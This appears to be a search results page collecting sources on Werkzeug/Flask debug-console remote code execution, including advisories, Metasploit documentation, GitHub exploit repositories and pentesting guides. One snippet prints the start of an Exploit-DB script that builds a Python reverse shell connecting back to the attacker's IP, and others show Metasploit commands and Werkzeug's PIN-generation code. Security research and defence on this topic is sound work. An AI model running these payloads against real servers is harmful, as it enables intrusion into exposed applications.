🌐
Rapid7
rapid7.com › db › modules › exploit › multi › http › werkzeug_debug_rce
Pallete Projects Werkzeug Debugger Remote Code ...
This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.
🌐
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
🌐
GitHub
github.com › rapid7 › metasploit-framework › blob › master › documentation › modules › exploit › multi › http › werkzeug_debug_rce.md
metasploit-framework/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md at master · rapid7/metasploit-framework
Do: set FLASKPATH /usr/local/lib/<python3.version>/site-packages/flask/app.py (where <python3.version> matches the version on the system being exploited) ... You should see a failure due to the check failing. Method of authentication. Valid values are: generated-cookie: Cookie generated from information provided about the application's environment. When this mode is used, the following additional options must be set: APPNAME: The name of the application according to Werkzeug. This is often Flask, DebuggedApplication or wsgi_app.
Author   rapid7
🌐
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages   Python
🌐
GitHub
github.com › pallets › werkzeug › security › advisories › GHSA-2g68-c3qc-8985
Werkzeug debugger vulnerable to remote execution when interacting with attacker controlled domain
May 5, 2024 - The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances. This requires the attacker to get the developer to interact wi...
🌐
FortiGuard
fortiguard.com › encyclopedia › ips › 41204
Werkzeug.Debug.Shell.Command.Execution
This indicates an attack attempt to exploit a Remote Code Execution in Werkzeug Debug Console. The vulnerability is caused by a design weakness when the target application handles a maliciously crafted debug command.
🌐
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin by default. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector.
Starred by 64 users
Forked by 7 users
Languages   Python 85.8% | Dockerfile 14.2%
🌐
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
A message regarding the “console locked” scenario is encountered when attempting to access Werkzeug’s debug interface, indicating a requirement for a PIN to unlock the console. The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py).
🌐
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
People would say it's based on the MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand this exploit at all, I made my own exploit.
Starred by 10 users
Forked by 8 users
Languages   Python
🌐
Werkzeug
werkzeug.palletsprojects.com › en › stable › debug
Debugging Applications — Werkzeug Documentation (3.1.x)
This is a security helper to make it less likely for the debugger to be exploited if you forget to disable it when deploying to production. The PIN based authentication is enabled by default. The first time a console is opened, a dialog will prompt for a PIN that is printed to the command line.
🌐
InfosecMatter
infosecmatter.com › home › metasploit module library
Werkzeug Debug Shell Command Execution - Metasploit - InfosecMatter
December 4, 2022 - A sample application which enables the console debugger is available here ... Do: check [+] 10.108.106.201:8081 - The target is vulnerable. ... You should get a shell. ... TARGETURI by default is /console, as defined by werkzeug, however it can be changed within the python script. Example utilizing the previously mentioned sample app listed above. msf > use exploit/multi/http/werkzeug_debug_rce msf exploit(werkzeug_debug_rce) > set rport 8081 rport => 8081 msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201 rhost => 10.108.106.201 msf exploit(werkzeug_debug_rce) > check [+] 10.108.106.201:8081 - The target is vulnerable.
🌐
Gitbook
angelica.gitbook.io › hacktricks › network-services-pentesting › pentesting-web › werkzeug
Werkzeug / Flask Debug - HackTricks - GitBook
November 10, 2024 - GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.
🌐
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
These exploits were developed after reviewing Werkzeug source code repo to better understand how the code is generated to then reverse it. The following is the function that generates the pin in Werkzeug from __init__.py. def get_pin_and_cookie_name(app): pin = os.environ.get('WERKZEUG_DEBUG_PIN') rv = None num = None # Pin was explicitly disabled if pin == 'off': return None, None # Pin was provided explicitly if pin is not None and pin.replace('-', '').isdigit(): # If there are separators in the pin, return it directly if '-' in pin: rv = pin else: num = pin modname = getattr(app, '__module__', getattr(app.__class__, '__module__')) try: # `getpass.getuser()` imports the `pwd` module, # which does not exist in the Google App Engine sandbox.
Author   grav3m1nd-byte
🌐
Medium
medium.com › swlh › hacking-flask-applications-939eae4bffed
Hacking Flask Applications. Executing arbitrary commands using the… | by Vickie Li | The Startup | Medium
February 18, 2020 - A publicly exposed debugger will subject the machine to remote code execution. Once an attacker can execute arbitrary Python code on the server, she can directly leak all the sensitive data stored on the server.
🌐
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - ## # This module requires Metasploit: ... Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....
🌐
GitHub
github.com › rapid7 › metasploit-framework › blob › master › modules › exploits › multi › http › werkzeug_debug_rce.rb
metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb at master · rapid7/metasploit-framework
This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.
Author   rapid7
🌐
Thesmartscanner
thesmartscanner.com › security vulnerabilities › werkzeug interactive debugging is active - vulnerability
Werkzeug Interactive Debugging is Active - Vulnerability - SmartScanner
Werkzeug provides a WSGI middleware that renders nice tracebacks, optionally with an interactive debug console to execute code in any frame. This console functionality can be abused by attackers to run commands ...
🌐
Medium
medium.com › @rajk88 › understanding-werkzeug-exploitation-for-penetration-testers-b38f4502469b
Understanding Werkzeug Exploitation for Penetration Testers | by Raj K | Medium
December 7, 2024 - However, during development and debugging, it can expose sensitive functionalities that attackers might exploit, especially if the application is running in a non-production environment.
🌐
HackTricks
hacktricks.boitatech.com.br › pentesting › pentesting-web › werkzeug
werkzeug | HackTricks - Boitatech
September 30, 2021 - You can find the PIN printed out on the standard output of your shell that runs the server · Locate vulnerable Werkzeug debug console at path vulnerable-site.com/console, but is locked by secret PIN number.